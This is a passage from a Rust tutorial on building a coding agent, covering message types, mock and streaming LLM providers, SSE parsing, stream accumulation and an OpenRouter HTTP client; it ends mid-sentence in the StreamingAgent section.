A blanket impl lets Arc<P> also be a Provider, which is needed later for sharing a provider between an agent and its subagents:
#![allow(unused)] fn main() { impl<P: Provider> Provider for Arc<P> { ... } }
We implement the MockProvider in Chapter 5a and the OpenRouterProvider in Chapter 5b.
Putting it all together
After implementing src/types.rs, run the full chapter test suite:
cargo test -p mini-claw-code-starter test_mock_
What the tests verify
test_mock_message_user-- constructs aMessage::Userand verifies it holds the expected stringtest_mock_message_system-- constructs aMessage::Systemand verifies it holds the expected stringtest_mock_message_tool_result-- constructs aMessage::ToolResultand verifies bothidandcontentare correcttest_mock_assistant_turn-- builds anAssistantTurnwith text and verifiesstop_reasonisStoptest_mock_tool_definition_builder-- uses the builder to add parameters and verifies the resulting JSON schema has the correct structuretest_mock_tool_definition_optional_param-- adds an optional parameter and verifies it does not appear in therequiredarraytest_mock_toolset_empty-- creates an emptyToolSetand verifiesget()returnsNonefor any nametest_mock_token_usage_default-- verifies thatTokenUsage::default()initializes both counters to zero
What you built
This chapter established the type vocabulary for the entire agent:
Message-- a four-variant enum carrying every kind of conversation entry: system instructions, user input, assistant responses, and tool results.AssistantTurn-- the model's response, containing optional text, tool calls, a stop reason, and optional token usage.StopReason-- the binary signal that drives the agent loop: keep going or stop.ToolDefinition-- a builder for JSON Schema tool descriptions that the LLM uses to understand what tools are available.ToolCall-- the request side of tool execution, linked by ID toMessage::ToolResult.Tooltrait -- the minimal async interface every tool must implement:definition()andcall().ToolSet-- aHashMap-backed registry for looking up tools by name at runtime.Providertrait -- the async LLM abstraction, generic over any backend.TokenUsage-- per-request token tracking.
Key takeaway
The entire agent -- tools, providers, the loop itself -- is built on the vocabulary defined in this chapter. Getting these types right (especially the Message enum and StopReason) determines whether the agent loop is simple or tangled. The types are the contract; everything else is implementation.
None of these types do anything on their own -- they are the nouns of the system. In the next chapter, we will implement the MockProvider and OpenRouterProvider, giving these types their first verbs.
Check yourself
← Chapter 3: The Agentic Loop · Contents · Chapter 5a: Provider & Streaming Foundations →
Chapter 5a: Provider & Streaming Foundations
File(s) to edit:
src/streaming.rs— every stub taggedTODO ch5a:(everything exceptStreamingAgent, which is Ch5b's).
src/mock.rsalready carries theMockProviderstubs you filled in Chapter 1; this chapter leans on that work but does not re-fill it. If you skipped ahead from Ch1, go back and finish theTODO ch1:stubs first. Tests to run:cargo test -p mini-claw-code-starter test_mock_andcargo test -p mini-claw-code-starter test_streaming_parse_ test_streaming_accumulator_Estimated time: 35 min
Goal
- Revisit
MockProvider(built in Ch1) as the canonical example of theProvidertrait, and use it to motivate the streaming siblings below. - Implement
parse_sse_lineso we can turn a single SSE line intoStreamEvents. - Implement
StreamAccumulatorso a stream of deltas reassembles into a completeAssistantTurn. - Implement
MockStreamProviderso UI-facing code can be tested without a real HTTP connection. - Understand when to reach for
std::sync::Mutexvstokio::sync::Mutexin async code.
Chapter 4 defined the data that flows through the agent. This chapter (and the next) turn those types into something that can actually drive data — an LLM backend. We split the work in two halves:
- Ch5a (this chapter): the abstractions and testable foundations — traits, mock providers, SSE parsing, stream accumulation.
- Ch5b: the real HTTP provider (
OpenRouterProvider) and theStreamingAgentthat wires a stream channel through the agent loop.
Keeping streaming plumbing (this chapter) separate from networking and orchestration (next chapter) makes each part testable in isolation.
How streaming works end-to-end
For orientation, here is what the finished system looks like. Don't worry about the StreamingAgent and OpenRouter API boxes yet — those belong to 5b. This chapter builds every other box.
sequenceDiagram
participant Agent
participant StreamProvider
participant API as LLM API
participant Channel as mpsc channel
participant UI
Agent->>StreamProvider: stream_chat(messages, tools, tx)
StreamProvider->>API: POST /chat/completions (stream: true)
loop SSE chunks
API-->>StreamProvider: data: {"delta": ...}
StreamProvider->>StreamProvider: parse_sse_line
StreamProvider->>Channel: send(StreamEvent)
StreamProvider->>StreamProvider: accumulator.feed(event)
Channel-->>UI: recv() and render
end
API-->>StreamProvider: data: [DONE]
StreamProvider->>Agent: return accumulator.finish()
Why a trait?
A coding agent needs to call an LLM, but which LLM should not be hard-coded. During tests we want instant, deterministic responses. In production we want streaming over HTTP. The Provider trait gives us that seam.
Claude Code uses a similar abstraction internally — every LLM call goes through a provider interface, and the choice of backend (Anthropic API, Bedrock, Vertex) is resolved at startup.
The Provider trait (RPITIT)
Here is the full trait:
#![allow(unused)] fn main() { pub trait Provider: Send + Sync { fn chat<'a>( &'a self, messages: &'a [Message], tools: &'a [&'a ToolDefinition], ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a; } }
A few things to notice:
No #[async_trait]. The Provider trait uses return-position impl Trait in traits (RPITIT) — stabilized in Rust 1.75. Writing fn chat(...) -> impl Future<...> instead of async fn chat(...) gives us explicit control over the lifetime and Send bound; async fn in a trait does not always infer Send for the returned future, which would prevent spawning onto a multi-threaded runtime. The explicit impl Future<...> + Send + 'a signature solves that, and it avoids the heap allocation that #[async_trait] would require.
The Tool trait in Chapter 6 uses #[async_trait] for the opposite reason — object safety for heterogeneous storage. For the full explanation of when to pick which style, see Why two async trait styles?. The one-liner version is also in Chapter 2.
Why Send + Sync on the trait itself? Our agent loop will hold a P: Provider behind a shared reference (and later behind Arc). The Sync bound lets multiple tasks share the provider, and Send lets it cross thread boundaries.
Lifetime 'a everywhere. The returned future borrows both &self and the input slices. Tying them to a single lifetime 'a tells the compiler the future lives no longer than those borrows, avoiding 'static requirements.
The Provider trait is already defined in src/types.rs (Chapter 4). The starter puts it alongside the message types because everything lives in a flat layout.
The Arc<P> blanket impl
Directly below the Provider trait, the starter has:
#![allow(unused)] fn main() { impl<P: Provider> Provider for Arc<P> { fn chat<'a>( &'a self, messages: &'a [Message], tools: &'a [&'a ToolDefinition], ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a { (**self).chat(messages, tools) } } }
This says: "if P is a Provider, then Arc<P> is also a Provider." It just dereferences through the Arc and delegates to the inner value.
Why does this matter? Later, when we build subagents, the main agent and its subagents will share the same provider. Cloning an Arc is cheap, and the blanket impl means subagent code that is generic over P: Provider works identically whether it receives a bare provider or a shared one. Without this impl, you would need separate type plumbing to pass shared providers around.
Both the Provider trait and the Arc<P> blanket impl are already in src/types.rs.
MockProvider
Testing an agent against a live API is slow, expensive, and nondeterministic. The MockProvider lets you script exact responses and verify that your agent handles them correctly.
#![allow(unused)] fn main() { use std::collections::VecDeque; use std::sync::Mutex; pub struct MockProvider { responses: Mutex<VecDeque<AssistantTurn>>, } impl MockProvider { pub fn new(responses: VecDeque<AssistantTurn>) -> Self { Self { responses: Mutex::new(responses), } } } impl Provider for MockProvider { async fn chat( &self, _messages: &[Message], _tools: &[&ToolDefinition], ) -> anyhow::Result<AssistantTurn> { self.responses .lock() .unwrap() .pop_front() .ok_or_else(|| anyhow::anyhow!("MockProvider: no more responses")) } } }
Rust concept: std::sync::Mutex vs tokio::sync::Mutex
The Provider trait takes &self (not &mut self), because providers are shared. But we need to mutate the queue. Which Mutex should we use?
The rule of thumb: use std::sync::Mutex when the critical section is trivial (no .await inside the lock), and tokio::sync::Mutex when you need to hold the lock across an .await point. Here the critical section is just a pop_front — a single pointer operation. Using tokio::sync::Mutex would add unnecessary overhead (it is an async-aware lock that yields to the runtime). std::sync::Mutex is cheaper and perfectly safe because the lock is never held long enough to block the runtime.
The design:
VecDeque— responses are consumed in FIFO order. The first call tochatreturns the first response, the second call returns the second, and so on.Mutex— wraps the queue so&selfmethods can mutate it. See the Rust concept note above for whystd::sync::Mutexis the right choice here.- Error on exhaustion — if the test scripts three responses but the agent calls
chata fourth time, it gets an error instead of a silent panic. This catches agent loops that spin more times than expected.
Testing strategy
The MockProvider is the foundation of all our tests. By scripting the exact sequence of responses, you can test:
- Single-turn: one response with
StopReason::Stop - Tool use loops: first response has
StopReason::ToolUsewith tool calls, the agent executes them and sends results back, second response hasStopReason::Stop - Multi-turn sequences: any number of scripted turns
- Error handling: an empty queue returns an error
A typical test:
#![allow(unused)] fn main() { #[tokio::test] async fn mock_returns_text() { let provider = MockProvider::new(VecDeque::from([AssistantTurn { text: Some("Hello!".into()), tool_calls: vec![], stop_reason: StopReason::Stop, usage: None, }])); let turn = provider.chat(&[Message::User("Hi".into())], &[]).await.unwrap(); assert_eq!(turn.text.as_deref(), Some("Hello!")); } }
Notice that the test ignores the messages input — the mock does not look at what the agent sends. This is intentional. You are testing the agent's behavior given a known provider response, not the provider's ability to understand prompts.
Your task
Open src/mock.rs in the starter. You will see the MockProvider struct with unimplemented!() stubs. Fill in new() and the Provider impl.
StreamEvent
Before defining the streaming trait, we need a vocabulary for the incremental chunks an LLM sends back:
#![allow(unused)] fn main() { #[derive(Debug, Clone, PartialEq)] pub enum StreamEvent { /// A fragment of the model's text response. TextDelta(String), /// The beginning of a tool call (carries the call ID and tool name). ToolCallStart { index: usize, id: String, name: String, }, /// A fragment of a tool call's JSON arguments. ToolCallDelta { index: usize, arguments: String, }, /// The stream is complete. Done, } }
These four variants map directly to the OpenAI streaming API:
- TextDelta — a fragment of the model's natural-language output (e.g.
"Hello", then" world"). - ToolCallStart — the model has begun a tool call.
indexidentifies which call (a single turn can request multiple tools),idis a server-assigned correlation ID, andnameis the tool. - ToolCallDelta — a fragment of the JSON arguments for the call at
index. Arguments arrive incrementally because the model generates JSON token-by-token. - Done — end-of-stream signal.
The index field matters because streaming interleaves fragments from multiple tool calls, and consumers need to know which call each fragment belongs to.
The StreamProvider trait
#![allow(unused)] fn main() { pub trait StreamProvider: Send + Sync { fn stream_chat<'a>( &'a self, messages: &'a [Message], tools: &'a [&'a ToolDefinition], tx: mpsc::UnboundedSender<StreamEvent>, ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a; } }
The design uses a channel-based streaming model rather than returning an AsyncIterator or Stream. The caller creates a tokio::sync::mpsc::unbounded_channel(), passes the sender half to stream_chat, and reads events from the receiver half — typically in a separate task that renders them to the terminal.
The method itself still returns the fully assembled AssistantTurn when the stream is complete. This means the agent loop always gets a clean AssistantTurn to work with, regardless of whether streaming is enabled. The channel is a side-channel for the UI.
Why UnboundedSender instead of a bounded channel? Streaming events are tiny and arrive at network speed, not faster. Backpressure is unnecessary because the bottleneck is the API, not the consumer. An unbounded channel keeps the API simpler.
The StreamEvent enum and StreamProvider trait both live in src/streaming.rs in the starter.
MockStreamProvider
The MockStreamProvider wraps a MockProvider and synthesizes StreamEvents from each canned response. This lets you test UI code that consumes stream events without needing a real HTTP connection.
The struct wraps a MockProvider and its stream_chat impl works in three steps:
- Delegate to
self.inner.chat()to get the cannedAssistantTurn - Decompose it into events: text is sent character-by-character as
TextDeltaevents, each tool call emits aToolCallStart+ singleToolCallDelta, and a finalDoneis sent - Return the original
AssistantTurnunchanged
Here is the full implementation:
#![allow(unused)] fn main() { pub struct MockStreamProvider { inner: MockProvider, } impl MockStreamProvider { pub fn new(responses: VecDeque<AssistantTurn>) -> Self { Self { inner: MockProvider::new(responses), } } } impl StreamProvider for MockStreamProvider { async fn stream_chat( &self, messages: &[Message], tools: &[&ToolDefinition], tx: mpsc::UnboundedSender<StreamEvent>, ) -> anyhow::Result<AssistantTurn> { let turn = self.inner.chat(messages, tools).await?; // Synthesize stream events from the complete turn if let Some(ref text) = turn.text { for ch in text.chars() { let _ = tx.send(StreamEvent::TextDelta(ch.to_string())); } } for (i, call) in turn.tool_calls.iter().enumerate() { let _ = tx.send(StreamEvent::ToolCallStart { index: i, id: call.id.clone(), name: call.name.clone(), }); let _ = tx.send(StreamEvent::ToolCallDelta { index: i, arguments: call.arguments.to_string(), }); } let _ = tx.send(StreamEvent::Done); Ok(turn) } } }
This avoids duplicating the response queue logic — the inner.chat() call handles the VecDeque pop. The let _ = tx.send(...) pattern intentionally ignores send errors — if the receiver is dropped, nobody is listening, and that is fine.
Your task
Fill in MockStreamProvider::new() and its stream_chat() stub in src/streaming.rs.
Server-Sent Events and parse_sse_line
When the real provider requests stream: true, the API returns a stream of Server-Sent Events (SSE). SSE is a simple text protocol over HTTP:
data: {"choices":[{"delta":{"content":"Hello"},"finish_reason":null}]}
data: {"choices":[{"delta":{"content":" world"},"finish_reason":null}]}
data: [DONE]
Each event is a line starting with data: followed by a JSON payload (or the special string [DONE]). Events are separated by blank lines. That is the entire protocol — no framing, no length prefixes, just newline-delimited text. This simplicity is why SSE is the standard for LLM streaming.
Our parse_sse_line function handles a single line:
#![allow(unused)] fn main() { pub fn parse_sse_line(line: &str) -> Option<Vec<StreamEvent>> { let data = line.strip_prefix("data: ")?; if data == "[DONE]" { return Some(vec![StreamEvent::Done]); } let chunk: ChunkResponse = serde_json::from_str(data).ok()?; let choice = chunk.choices.into_iter().next()?; let mut events = Vec::new(); if let Some(text) = choice.delta.content && !text.is_empty() { events.push(StreamEvent::TextDelta(text)); } if let Some(tool_calls) = choice.delta.tool_calls { for tc in tool_calls { if let Some(id) = tc.id { let name = tc.function .as_ref() .and_then(|f| f.name.clone()) .unwrap_or_default(); events.push(StreamEvent::ToolCallStart { index: tc.index, id, name, }); } if let Some(ref func) = tc.function && let Some(ref args) = func.arguments && !args.is_empty() { events.push(StreamEvent::ToolCallDelta { index: tc.index, arguments: args.clone(), }); } } } if events.is_empty() { None } else { Some(events) } } }
Walk through the logic:
- Strip the
data:prefix. Lines that do not start withdata:(likeevent: pingor blank lines) returnNone— they are not data events. - Check for
[DONE]. This is the OpenAI-standard end-of-stream sentinel. Return aDoneevent. - Parse JSON into
ChunkResponse. If the JSON is malformed,.ok()?silently skips it. This is intentional — SSE streams occasionally include keep-alive pings or malformed chunks, and crashing would be worse than dropping a token. - Extract text deltas. The
delta.contentfield contains the text fragment. Empty strings are skipped. - Extract tool call events. A single chunk can contain both a
ToolCallStart(when theidfield is present, signaling a new call) and aToolCallDelta(whenargumentsis present). Theif let ... && let ...syntax is Rust's let-chains feature, stabilized in edition 2024.
Rust concept: let-chains
The if let Some(ref func) = tc.function && let Some(ref args) = func.arguments syntax combines two pattern matches into a single if expression. Before let-chains, you would need nested if let blocks or a match with a tuple. Let-chains flatten the nesting and make the condition more readable. The ref keyword borrows the matched value instead of moving it, which is necessary here because tc is used again after the if let.
The tests verify the parser against three cases: a text delta line produces StreamEvent::TextDelta("Hello"), the data: [DONE] line produces StreamEvent::Done, and non-data lines like event: ping or empty strings return None.
Your task
The parse_sse_line function and its SSE deserialization types (ChunkResponse, ChunkChoice, Delta, DeltaToolCall, DeltaFunction) are in src/streaming.rs. Fill in the parse_sse_line stub.
StreamAccumulator
Streaming gives the UI real-time output, but the agent loop needs a complete AssistantTurn to decide what to do next. The StreamAccumulator bridges this gap — it collects events as they arrive and produces a finished message at the end.
#![allow(unused)] fn main() { pub struct StreamAccumulator { text: String, tool_calls: Vec<PartialToolCall>, } struct PartialToolCall { id: String, name: String, arguments: String, } }
The two key methods:
#![allow(unused)] fn main() { impl StreamAccumulator { pub fn new() -> Self { Self { text: String::new(), tool_calls: Vec::new(), } } pub fn feed(&mut self, event: &StreamEvent) { match event { StreamEvent::TextDelta(s) => self.text.push_str(s), StreamEvent::ToolCallStart { index, id, name } => { // Ensure the Vec is large enough for this index while self.tool_calls.len() <= *index { self.tool_calls.push(PartialToolCall { id: String::new(), name: String::new(), arguments: String::new(), }); } self.tool_calls[*index].id = id.clone(); self.tool_calls[*index].name = name.clone(); } StreamEvent::ToolCallDelta { index, arguments } => { if let Some(tc) = self.tool_calls.get_mut(*index) { tc.arguments.push_str(arguments); } } StreamEvent::Done => {} } } pub fn finish(self) -> AssistantTurn { let text = if self.text.is_empty() { None } else { Some(self.text) }; let tool_calls: Vec<ToolCall> = self .tool_calls .into_iter() .filter(|tc| !tc.name.is_empty()) .map(|tc| ToolCall { id: tc.id, name: tc.name, arguments: serde_json::from_str(&tc.arguments) .unwrap_or(Value::Null), }) .collect(); let stop_reason = if tool_calls.is_empty() { StopReason::Stop } else { StopReason::ToolUse }; AssistantTurn { text, tool_calls, stop_reason, usage: None, } } } }
Design notes:
feedappends incrementally. Text fragments concatenate intoself.text. Tool call arguments concatenate per-index intoPartialToolCall::arguments.- Sparse index handling. The
whileloop inToolCallStartpads the vector with empty entries so thatindex: 2works even if the vector only has one element. Thefilter(|tc| !tc.name.is_empty())infinishstrips those placeholders. - Deferred JSON parsing. Arguments arrive as string fragments during streaming.
finishparses the concatenated string intoserde_json::Valueonly after the stream ends, falling back toValue::Nullon malformed JSON. stop_reasonis derived from the tool calls. If any survived the filter, it isToolUse; otherwiseStop. Usage isNonebecause most streaming APIs do not include token counts per chunk.
The accumulator tests (test_streaming_accumulator_text, test_streaming_accumulator_tool_call) feed two text deltas or a tool-call-start plus two argument fragments and verify that the concatenated result is what you'd expect.
Your task
The StreamAccumulator and PartialToolCall are in src/streaming.rs. Fill in the new(), feed(), and finish() stubs.
Run the tests
cargo test -p mini-claw-code-starter test_mock_
cargo test -p mini-claw-code-starter test_streaming_parse_
cargo test -p mini-claw-code-starter test_streaming_accumulator_
What these tests verify
test_mock_ (MockProvider):
test_mock_mock_returns_text— scripts a single text response and verifieschat()returns ittest_mock_mock_exhausted— callschat()on an empty queue and verifies it returns an error
test_streaming_parse_ (SSE parser):
test_streaming_parse_text_delta— feeds adata:line with text content and verifies aTextDeltaevent is producedtest_streaming_parse_done— feedsdata: [DONE]and verifies aDoneevent is producedtest_streaming_parse_non_data_lines— feeds a non-data line likeevent: pingand verifiesNoneis returned
test_streaming_accumulator_ (stream reassembly):
test_streaming_accumulator_text— feeds twoTextDeltaevents and verifies the concatenated resulttest_streaming_accumulator_tool_call— feeds aToolCallStartand twoToolCallDeltafragments, verifies they reassemble into a validToolCallwith parsed JSON arguments
Everything else (test_openrouter_, test_streaming_streaming_agent_, test_streaming_stream_chat_) belongs to Chapter 5b.
Key takeaway
The provider layer decouples the agent from any specific LLM backend. MockProvider makes tests fast and deterministic; the StreamProvider trait pipes incremental events out on a channel while the method itself still returns a clean AssistantTurn; StreamAccumulator is the bridge that lets the UI see tokens as they arrive while the agent loop sees a complete message.
Everything in this chapter is testable without a network. Next up in Chapter 5b, we plug these primitives into a real HTTP provider and wire the events channel through the agent loop.
Check yourself
← Chapter 4: Messages & Types · Contents · Chapter 5b: OpenRouter & StreamingAgent →
Chapter 5b: OpenRouter & StreamingAgent
File(s) to edit:
src/providers/openrouter.rs,src/streaming.rs(theStreamingAgentblock at the bottom) Tests to run:cargo test -p mini-claw-code-starter test_openrouter_,cargo test -p mini-claw-code-starter test_streaming_streaming_agent_,cargo test -p mini-claw-code-starter test_streaming_stream_chat_Estimated time: 35 min
Goal
- Implement
OpenRouterProviderso the agent can talk to a real OpenAI-compatible API — both non-streaming and streaming. - Implement
StreamingAgent::chat— the agent loop that forwards streaming text deltas to a UI channel while running tools.
Chapter 5a built the abstractions (Provider, StreamProvider, StreamEvent), the mocks (MockProvider, MockStreamProvider), and the parse/accumulate machinery (parse_sse_line, StreamAccumulator). This chapter plugs those pieces into a real HTTP provider and wires a streaming channel through the agent loop.
If anything below assumes parse_sse_line or StreamAccumulator exists — it does, because you implemented it in 5a.
Sidebar: tokio concurrency for Go devs
If Go is your native async language, here is the translation table you need
before reading the streaming code. Everything in this chapter rests on these
five primitives; skip this box if you already think in tokio.
| Go | Tokio | Notes |
|---|---|---|
go func() { ... }() | tokio::spawn(async { ... }) | Both fire-and-forget. tokio::spawn returns a JoinHandle you can await later if you care about the result. |
ch := make(chan T, n) | let (tx, rx) = tokio::sync::mpsc::channel::<T>(n) | Bounded channel. For unbounded_channel() use mpsc::unbounded_channel() -- analogous to a channel with infinite buffer. |
ch <- v | tx.send(v).await | Async send in Tokio (awaits when buffer full). The unbounded variant uses tx.send(v) with no .await. |
v, ok := <-ch | let Some(v) = rx.recv().await { ... } | recv returns None when all senders are dropped (equivalent to close(ch) + drain). |
close(ch) | drop every tx clone | Tokio has no explicit close. When the last sender is dropped, receivers see None and loops exit. |
wg.Add(1); wg.Wait() | handle.await (or tokio::join!, try_join!) | A JoinHandle is like a single-goroutine WaitGroup. Multiple handles: tokio::join!(h1, h2) runs them concurrently. |
select { case <-a: case <-b: } | tokio::select! { _ = a => ..., _ = b => ... } | Direct analogue. Loses on non-disjoint branches unless you use biased;. |
One non-obvious point specific to this chapter: we signal "the stream is
over" by dropping the sender. There is no explicit close call. The receiver
task observes rx.recv().await == None and exits its loop. If you forget to
drop the sender (for example by holding it inside an Arc that outlives the
producer), the receiver hangs forever -- this is one of the deadlock
patterns that §"Why not just rx.recv() in the main loop?" walks through.
OpenRouterProvider
With the parsing infrastructure in place, we can build the real provider. It targets the OpenRouter API, which is OpenAI-compatible — the same request/response format works with OpenAI, Together, Groq, and many others.
API types
The provider needs serde types for the request and response payloads. Here is the request side:
#![allow(unused)] fn main() { #[derive(Serialize)] struct ChatRequest<'a> { model: &'a str, messages: Vec<ApiMessage>, #[serde(skip_serializing_if = "Vec::is_empty")] tools: Vec<ApiTool>, #[serde(skip_serializing_if = "std::ops::Not::not")] stream: bool, } }
The skip_serializing_if annotations keep the JSON clean — tools is omitted when empty (some models choke on an empty array), and stream is omitted when false (the default for the API).
ApiMessage, ApiToolCall, ApiFunction, ApiTool, and ApiToolDef mirror the OpenAI message format. The response types (ChatResponse, Choice, ResponseMessage) deserialize the non-streaming response. The chunk types (ChunkResponse, ChunkChoice, Delta, DeltaToolCall, DeltaFunction) deserialize the streaming response — you already implemented those in 5a for parse_sse_line.
Conversion helpers
Two impl methods on OpenRouterProvider translate between our internal
types and the API format. convert_messages handles the four Message
variants:
#![allow(unused)] fn main() { pub(crate) fn convert_messages(messages: &[Message]) -> Vec<ApiMessage> { let mut out = Vec::new(); for msg in messages { match msg { Message::System(text) => out.push(ApiMessage { role: "system".into(), content: Some(text.clone()), tool_calls: None, tool_call_id: None, }), Message::User(text) => out.push(ApiMessage { role: "user".into(), content: Some(text.clone()), tool_calls: None, tool_call_id: None, }), Message::Assistant(turn) => out.push(ApiMessage { role: "assistant".into(), content: turn.text.clone(), tool_calls: if turn.tool_calls.is_empty() { None } else { Some( turn.tool_calls .iter() .map(|c| ApiToolCall { id: c.id.clone(), type_: "function".into(), function: ApiFunction { name: c.name.clone(), arguments: c.arguments.to_string(), }, }) .collect(), ) }, tool_call_id: None, }), Message::ToolResult { id, content } => out.push(ApiMessage { role: "tool".into(), content: Some(content.clone()), tool_calls: None, tool_call_id: Some(id.clone()), }), } } out } }
Four details worth pausing on:
SystemandUserare symmetric. Same shape, different role string. Everything else (tool_calls,tool_call_id) isNone.Assistantis the variant with the nuance. Thetextfield maps directly tocontent, but the tool calls have to be reserialised.c.argumentsis aserde_json::Value; the OpenAI API wants it as a JSON string, so we call.to_string()to turn theValueback into text. Emitting an emptytool_calls: []array makes some providers reject the request as malformed, so we sendNoneinstead.ToolResultbecomesrole: "tool". This is the variant that ties a result back to its originating call viatool_call_id. Without that id the provider cannot associate the result with the call, and the next response is usually an error.- No default branch. Every
Messagevariant is handled explicitly. If you add a new variant in Chapter 4, the match will fail to compile here until you decide how it should serialise — which is the behaviour we want.
convert_tools is simpler: wrap each ToolDefinition in the OpenAI
function-calling envelope.
#![allow(unused)] fn main() { pub(crate) fn convert_tools(tools: &[&ToolDefinition]) -> Vec<ApiTool> { tools .iter() .map(|t| ApiTool { type_: "function", function: ApiToolDef { name: t.name, description: t.description, parameters: t.parameters.clone(), }, }) .collect() } }
The envelope is a fixed shape: { "type": "function", "function": { name, description, parameters } }. Every OpenAI-compatible provider expects
exactly this, and our ToolDefinition was designed in Ch4 specifically
so this mapping is a one-liner.
The provider struct
#![allow(unused)] fn main() { pub struct OpenRouterProvider { client: reqwest::Client, api_key: String, model: String, base_url: String, } }
The struct holds a reusable reqwest::Client, the API key, model name, and base URL. Constructors include new(api_key, model) for explicit creation, from_env() which loads OPENROUTER_API_KEY via dotenvy, and a base_url(self, url) builder method for overriding the endpoint (useful for local testing or alternative providers).
Non-streaming Provider impl
The non-streaming path is the simpler one: one POST, one JSON response, one
AssistantTurn returned. Here it is end to end:
#![allow(unused)] fn main() { impl Provider for OpenRouterProvider { async fn chat( &self, messages: &[Message], tools: &[&ToolDefinition], ) -> anyhow::Result<AssistantTurn> { let body = ChatRequest { model: &self.model, messages: Self::convert_messages(messages), tools: Self::convert_tools(tools), stream: false, }; let resp: ChatResponse = self .client .post(format!("{}/chat/completions", self.base_url)) .bearer_auth(&self.api_key) .json(&body) .send() .await .context("request failed")? .error_for_status() .context("API returned error status")? .json() .await .context("failed to parse response")?; let choice = resp.choices.into_iter().next().context("no choices")?; let tool_calls = choice .message .tool_calls .unwrap_or_default() .into_iter() .map(|tc| { let arguments = serde_json::from_str(&tc.function.arguments).unwrap_or(Value::Null); ToolCall { id: tc.id, name: tc.function.name, arguments, } }) .collect(); let stop_reason = match choice.finish_reason.as_deref() { Some("tool_calls") => StopReason::ToolUse, _ => StopReason::Stop, }; let usage = resp.usage.map(|u| TokenUsage { input_tokens: u.prompt_tokens.unwrap_or(0), output_tokens: u.completion_tokens.unwrap_or(0), }); Ok(AssistantTurn { text: choice.message.content, tool_calls, stop_reason, usage, }) } } }
Three decisions to notice:
error_for_status()turns HTTP 4xx/5xx into anErr. Otherwise a 403 from OpenRouter would deserialize whatever body came back as if it were aChatResponseand fail confusingly later.- Tool-call arguments arrive as a JSON string, not a
Value. The OpenAI spec puts"arguments": "{\"path\":\"foo.rs\"}"in the wire format. We parse it back into aValueourselves; on a parse failure we fall back toValue::Nullso a malformedargumentsfield does not abort the whole turn. stop_reasonis a straight mapping offinish_reason. Only"tool_calls"becomesToolUse; everything else ("stop","length", null, missing) becomesStop. This matches the "the model decides" story from Chapter 3's aside -- we are just translating the model's own stop signal.
Streaming StreamProvider impl
The streaming path is the same request shape with stream: true, but
instead of a single JSON body we read a chunked HTTP response and parse
it as Server-Sent Events. Here is the complete impl:
#![allow(unused)] fn main() { impl crate::streaming::StreamProvider for OpenRouterProvider { async fn stream_chat( &self, messages: &[Message], tools: &[&ToolDefinition], tx: tokio::sync::mpsc::UnboundedSender<crate::streaming::StreamEvent>, ) -> anyhow::Result<AssistantTurn> { use crate::streaming::{StreamAccumulator, parse_sse_line}; let body = ChatRequest { model: &self.model, messages: Self::convert_messages(messages), tools: Self::convert_tools(tools), stream: true, }; let mut resp = self .client .post(format!("{}/chat/completions", self.base_url)) .bearer_auth(&self.api_key) .json(&body) .send() .await .context("request failed")? .error_for_status() .context("API returned error status")?; let mut acc = StreamAccumulator::new(); let mut buffer = String::new(); while let Some(chunk) = resp.chunk().await.context("failed to read chunk")? { buffer.push_str(&String::from_utf8_lossy(&chunk)); while let Some(newline_pos) = buffer.find('\n') { let line = buffer[..newline_pos].trim_end_matches('\r').to_string(); buffer = buffer[newline_pos + 1..].to_string(); if line.is_empty() { continue; } if let Some(events) = parse_sse_line(&line) { for event in events { acc.feed(&event); let _ = tx.send(event); } } } } Ok(acc.finish()) } } }
Walk through it:
- Same request, but
stream: true. The API returns a chunked HTTP response instead of a single JSON body. The request construction and auth are identical to the non-streaming path; this is exactly what we want from an abstraction called "streaming". - Read raw byte chunks.
resp.chunk()returnsOption<Bytes>— the HTTP body arrives in arbitrary-sized pieces that do not align with SSE event boundaries. A singlechunkcould be a partial line, several lines, or multiple events crammed together. - Buffer and split on newlines. TCP chunks can split an SSE line in
the middle. The
bufferaccumulates raw text, and the innerwhileloop extracts complete lines. This is classic line-oriented protocol parsing — you accumulate bytes and consume lines as they become available. Notice the inner loop keeps going until no more complete lines remain in the buffer, then we wait for the next chunk. - Parse each line.
parse_sse_line(from 5a) converts adata:line intoStreamEvents. Blank lines (SSE event separators) and non-data lines (comments, keep-alives) returnNoneand are skipped. - Feed both the accumulator and the channel. For every event, the
accumulator updates its internal state (building the eventual
AssistantTurn) and the channel delivers the same event to the UI in real-time. Thelet _ = tx.send(event)deliberately discards a send error: if the receiver has been dropped (e.g. the forwarder task has exited because the main loop cancelled), we still want to finish consuming the stream so the underlying HTTP connection can be cleanly released. - Return the assembled message. Once the stream ends (
resp.chunk()returnsNone), the accumulator has collected everything, andfinish()produces the finalAssistantTurn. At this pointtxis dropped (the function is returning), which closes the channel and signals the forwarder task to exit — exactly the termination flow theStreamingAgentsection below depends on.
This dual-path design (accumulator + channel) is how Claude Code handles streaming too. The UI renders tokens as they arrive, but the agent loop sees a clean, complete response — no bespoke partial-state handling.
Your task
The OpenRouterProvider lives in src/providers/openrouter.rs. Fill in the constructor, conversion helpers, the Provider impl, and the StreamProvider impl. The required dependencies (reqwest, dotenvy) are already in Cargo.toml.
StreamingAgent
With streaming working at the provider level, we need an agent loop that benefits from it. Streaming an LLM reply into a provider is only useful if the text reaches the user's terminal as it arrives. That wiring is StreamingAgent.
StreamingAgent is the streaming counterpart of SimpleAgent from Chapter 3:
SimpleAgent::chatcallsprovider.chat()and returns a completeAssistantTurn.StreamingAgent::chatcallsprovider.stream_chat(), forwards text deltas to a UI channel while the LLM is still generating, and then returns the assembled response once the stream finishes.
The struct and builder look identical to SimpleAgent:
#![allow(unused)] fn main() { pub struct StreamingAgent<P: StreamProvider> { provider: P, tools: ToolSet, } impl<P: StreamProvider> StreamingAgent<P> { pub fn new(provider: P) -> Self { Self { provider, tools: ToolSet::new() } } pub fn tool(mut self, t: impl Tool + 'static) -> Self { self.tools.push(t); self } pub async fn run( &self, prompt: &str, events: mpsc::UnboundedSender<AgentEvent>, ) -> anyhow::Result<String> { let mut messages = vec![Message::User(prompt.to_string())]; self.chat(&mut messages, events).await } pub async fn chat( &self, messages: &mut Vec<Message>, events: mpsc::UnboundedSender<AgentEvent>, ) -> anyhow::Result<String> { /* ... */ } } }
run() is a thin wrapper around chat(). The real work is chat(), and it is this chapter's most subtle piece of code.
The two channels, and the problem they solve
StreamingAgent::chat sits between two channels that speak different vocabularies:
- Downstream (provider → agent): the provider speaks
